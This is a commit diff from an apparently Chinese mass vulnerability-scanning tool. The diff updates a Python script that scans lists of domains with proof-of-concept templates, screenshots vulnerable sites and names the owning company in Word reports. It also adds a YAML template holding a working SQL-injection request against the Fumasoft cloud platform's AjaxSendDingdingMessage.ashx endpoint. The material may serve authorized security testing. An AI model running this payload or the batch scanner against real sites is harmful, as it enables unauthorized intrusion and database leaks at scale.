更新备案API
This commit is contained in:
parent
6c96f50806
commit
3bfb52d5dc
@ -7,6 +7,7 @@ import urllib.parse
|
|||||||
import sys
|
import sys
|
||||||
import docx
|
import docx
|
||||||
import os
|
import os
|
||||||
|
import re
|
||||||
import warnings
|
import warnings
|
||||||
import requests
|
import requests
|
||||||
import argparse
|
import argparse
|
||||||
@ -48,11 +49,15 @@ def get_company_name(url):
|
|||||||
soup = BeautifulSoup(response.content, 'html.parser')
|
soup = BeautifulSoup(response.content, 'html.parser')
|
||||||
|
|
||||||
# 查找公司名称的<a>标签
|
# 查找公司名称的<a>标签
|
||||||
company_name_tag = soup.find('a', id='companyName')
|
company_name_tag = soup.find('div', {'tag': 'company_name'})
|
||||||
|
|
||||||
# 提取公司名称
|
# 提取公司名称
|
||||||
if company_name_tag:
|
if company_name_tag:
|
||||||
return company_name_tag.text
|
text = company_name_tag.text
|
||||||
|
cleaned_text = re.sub(r'[^\w\s]', '', text) # 去除英文符号
|
||||||
|
cleaned_text = re.sub(r'\s+', ' ', cleaned_text).strip() # 去除多余空格和换行符
|
||||||
|
return cleaned_text
|
||||||
|
# return company_name_tag.text
|
||||||
else:
|
else:
|
||||||
print("公司名称未找到")
|
print("公司名称未找到")
|
||||||
return None
|
return None
|
||||||
@ -100,9 +105,9 @@ def create_document():
|
|||||||
def extract_root_domain(url):
|
def extract_root_domain(url):
|
||||||
extracted = tldextract.extract(url)
|
extracted = tldextract.extract(url)
|
||||||
root_domain = f"{extracted.domain}.{extracted.suffix}"
|
root_domain = f"{extracted.domain}.{extracted.suffix}"
|
||||||
encoded_bytes = base64.b64encode(root_domain.encode('utf-8'))
|
# encoded_bytes = base64.b64encode(root_domain.encode('utf-8'))
|
||||||
encoded_str = encoded_bytes.decode('utf-8')
|
# encoded_str = encoded_bytes.decode('utf-8')
|
||||||
return urllib.parse.quote(encoded_str)
|
return urllib.parse.quote(root_domain)
|
||||||
|
|
||||||
def add_scan_results_to_document(document, domain, results, include_all, description, choice_3):
|
def add_scan_results_to_document(document, domain, results, include_all, description, choice_3):
|
||||||
for name, result, status_code, url, res_time in results:
|
for name, result, status_code, url, res_time in results:
|
||||||
@ -117,7 +122,8 @@ def add_scan_results_to_document(document, domain, results, include_all, descrip
|
|||||||
if result == "存在漏洞" and choice_3 == "y":
|
if result == "存在漏洞" and choice_3 == "y":
|
||||||
screenshot_path_1 = screenshot(url)
|
screenshot_path_1 = screenshot(url)
|
||||||
# print(screenshot_path_1)
|
# print(screenshot_path_1)
|
||||||
screenshot_path_2 = screenshot("https://icp.chinaz.com/home/info?host=" + extract_root_domain(domain))
|
# 站长工具反爬,该截图已废弃
|
||||||
|
# screenshot_path_2 = screenshot("https://icp.chinaz.com/home/info?host=" + extract_root_domain(domain))
|
||||||
# print(screenshot_path_2)
|
# print(screenshot_path_2)
|
||||||
#word处理部分
|
#word处理部分
|
||||||
#导入模板
|
#导入模板
|
||||||
@ -136,24 +142,25 @@ def add_scan_results_to_document(document, domain, results, include_all, descrip
|
|||||||
run = paragraph.add_run()
|
run = paragraph.add_run()
|
||||||
if screenshot_path_1:
|
if screenshot_path_1:
|
||||||
run.add_picture(screenshot_path_1, width=Cm(16.52), height=Cm(9.13)) #添加图片
|
run.add_picture(screenshot_path_1, width=Cm(16.52), height=Cm(9.13)) #添加图片
|
||||||
run.add_picture(screenshot_path_2, width=Cm(16.52), height=Cm(9.13)) #添加图片
|
# run.add_picture(screenshot_path_2, width=Cm(16.52), height=Cm(9.13)) #添加ICP备案图片,已废弃寻找新方法
|
||||||
doc_save_path = './file/result/'
|
doc_save_path = './file/result/'
|
||||||
if not os.path.exists(doc_save_path):
|
if not os.path.exists(doc_save_path):
|
||||||
os.mkdir(doc_save_path)
|
os.mkdir(doc_save_path)
|
||||||
#保存word,根据需要自行更改
|
#保存word,根据需要自行更改
|
||||||
company_name = get_company_name("https://icp.chinaz.com/" + domain)
|
company_name = get_company_name("https://whois.west.cn/icp/" + extract_root_domain(domain))
|
||||||
doc_name = str(company_name) + "_" + name + ".docx"
|
doc_name = str(company_name) + "_" + name + ".docx"
|
||||||
doc.save(doc_save_path + doc_name)
|
doc.save(doc_save_path + doc_name)
|
||||||
|
|
||||||
def mass_poc_scan(domains, include_all, choice_2, docx_name):
|
def mass_poc_scan(domains, include_all, choice_2, docx_name, status):
|
||||||
document = create_document()
|
document = create_document()
|
||||||
try:
|
try:
|
||||||
for domain in domains:
|
for domain in domains:
|
||||||
logging.info(f"正在扫描域名:{domain}")
|
logging.info(f"正在扫描域名:{domain}")
|
||||||
|
if status == 'y':
|
||||||
if not check_url_status(domain):
|
if not check_url_status(domain):
|
||||||
logging.warning(f"访问失败,跳过当前域名的扫描:{domain}")
|
logging.warning(f"访问失败,跳过当前域名的扫描:{domain}")
|
||||||
print("--------------------------------------------------")
|
print("--------------------------------------------------")
|
||||||
if choice_2.lower() == 'n':
|
if choice_2.lower() == 'y':
|
||||||
document.add_heading(f"目标:{domain} 无法访问!", level=3) # 将标题升级为level=3
|
document.add_heading(f"目标:{domain} 无法访问!", level=3) # 将标题升级为level=3
|
||||||
continue
|
continue
|
||||||
|
|
||||||
@ -163,6 +170,14 @@ def mass_poc_scan(domains, include_all, choice_2, docx_name):
|
|||||||
except Exception as e:
|
except Exception as e:
|
||||||
logging.error(f"扫描域名 {domain} 时出错:{e}")
|
logging.error(f"扫描域名 {domain} 时出错:{e}")
|
||||||
print("--------------------------------------------------")
|
print("--------------------------------------------------")
|
||||||
|
|
||||||
|
else:
|
||||||
|
try:
|
||||||
|
results, description = validate_main(domain)
|
||||||
|
add_scan_results_to_document(document, domain, results, include_all, description, choice_3)
|
||||||
|
except Exception as e:
|
||||||
|
logging.error(f"扫描域名 {domain} 时出错:{e}")
|
||||||
|
print("--------------------------------------------------")
|
||||||
except KeyboardInterrupt:
|
except KeyboardInterrupt:
|
||||||
print(Fore.RED +'\n检测到Ctrl+C,中断程序。' + Fore.RESET)
|
print(Fore.RED +'\n检测到Ctrl+C,中断程序。' + Fore.RESET)
|
||||||
save_document(document, docx_name)
|
save_document(document, docx_name)
|
||||||
@ -191,6 +206,7 @@ if __name__ == "__main__":
|
|||||||
file_path = "./urls.txt"
|
file_path = "./urls.txt"
|
||||||
include_all = False
|
include_all = False
|
||||||
choice_3 = 'y'
|
choice_3 = 'y'
|
||||||
|
status = 'y'
|
||||||
else:
|
else:
|
||||||
# 交互模式
|
# 交互模式
|
||||||
choice = input(Fore.BLUE + "请问是否需要输入其他目标文件?(y/n): " + Fore.RESET).lower()
|
choice = input(Fore.BLUE + "请问是否需要输入其他目标文件?(y/n): " + Fore.RESET).lower()
|
||||||
@ -203,6 +219,8 @@ if __name__ == "__main__":
|
|||||||
print("--------------------------------------------------")
|
print("--------------------------------------------------")
|
||||||
domains = extract_domains_from_file(file_path)
|
domains = extract_domains_from_file(file_path)
|
||||||
|
|
||||||
|
status = input(Fore.BLUE + "请问是否需要检查目标网站存活状态?(y/n): " + Fore.RESET).lower()
|
||||||
|
print("--------------------------------------------------")
|
||||||
choice_2 = input(Fore.BLUE + "请问是否删除无漏洞网站记录?(y/n): " + Fore.RESET).lower()
|
choice_2 = input(Fore.BLUE + "请问是否删除无漏洞网站记录?(y/n): " + Fore.RESET).lower()
|
||||||
include_all = choice_2 != 'y'
|
include_all = choice_2 != 'y'
|
||||||
print("--------------------------------------------------")
|
print("--------------------------------------------------")
|
||||||
@ -212,9 +230,13 @@ if __name__ == "__main__":
|
|||||||
# 执行扫描
|
# 执行扫描
|
||||||
domains = extract_domains_from_file(file_path)
|
domains = extract_domains_from_file(file_path)
|
||||||
if args.batch:
|
if args.batch:
|
||||||
mass_poc_scan(domains, include_all, choice_3, args.name)
|
mass_poc_scan(domains, include_all, choice_3, args.name, status)
|
||||||
else:
|
else:
|
||||||
docx_name = input(Fore.BLUE + "请输入总报告文件名(回车可跳过生成报告步骤):" + Fore.RESET)
|
docx_name = input(Fore.BLUE + "请输入总报告文件名(回车可跳过生成报告步骤):" + Fore.RESET)
|
||||||
print("--------------------------------------------------")
|
print("--------------------------------------------------")
|
||||||
mass_poc_scan(domains, include_all, choice_3, docx_name)
|
mass_poc_scan(domains, include_all, choice_3, docx_name, status)
|
||||||
|
|
||||||
|
# if __name__ == "__main__":
|
||||||
|
# domain = 'http://vr.sh-fit.com:9090'
|
||||||
|
# company_name = get_company_name("https://whois.west.cn/icp/" + extract_root_domain(domain))
|
||||||
|
# print(company_name)
|
30
poc/OA-Poc/fuma-AjaxSendDingdingMessage-SQL.yaml
Normal file
30
poc/OA-Poc/fuma-AjaxSendDingdingMessage-SQL.yaml
Normal file
@ -0,0 +1,30 @@
|
|||||||
|
keyword: fumasoft
|
||||||
|
name: 孚盟云平台存在SQL注入漏洞
|
||||||
|
description: | # 下一行可填写漏洞描述
|
||||||
|
孚盟云平台AjaxSendDingdingMessage.ashx接口存在SQL注入漏洞。
|
||||||
|
requests: # 为空代表默认或者不启用
|
||||||
|
path: "/m/Dingding/Ajax/AjaxSendDingdingMessage.ashx"
|
||||||
|
method: POST
|
||||||
|
headers:
|
||||||
|
Accept: '*/*'
|
||||||
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.1.2 Safari/603.3.8
|
||||||
|
Referer: https://www.baidu.com
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Connection: keep-alive
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
body-raw: |- # 如果需要发送请求体,在下一行开始填写
|
||||||
|
action=SendDingMeg_Mail&empId=2'+and+1=@@VERSION--+
|
||||||
|
|
||||||
|
response:
|
||||||
|
path: "" # 不填则默认接收此请求的响应包
|
||||||
|
status-code: 200
|
||||||
|
body: "Copyright" # 此处可填写响应体中确认漏洞存在的关键字或者其他信息
|
||||||
|
time: # 此处填写响应包响应时间,默认不启用
|
||||||
|
headers:
|
||||||
|
Server:
|
||||||
|
Content-type:
|
||||||
|
Content-length:
|
||||||
|
Date:
|
||||||
|
Connection:
|
||||||
|
impact: | # 下一行可填写漏洞影响
|
||||||
|
孚盟云平台AjaxSendDingdingMessage.ashx接口存在SQL注入漏洞,可能导致数据库敏感信息泄露。
|
Loading…
Reference in New Issue
Block a user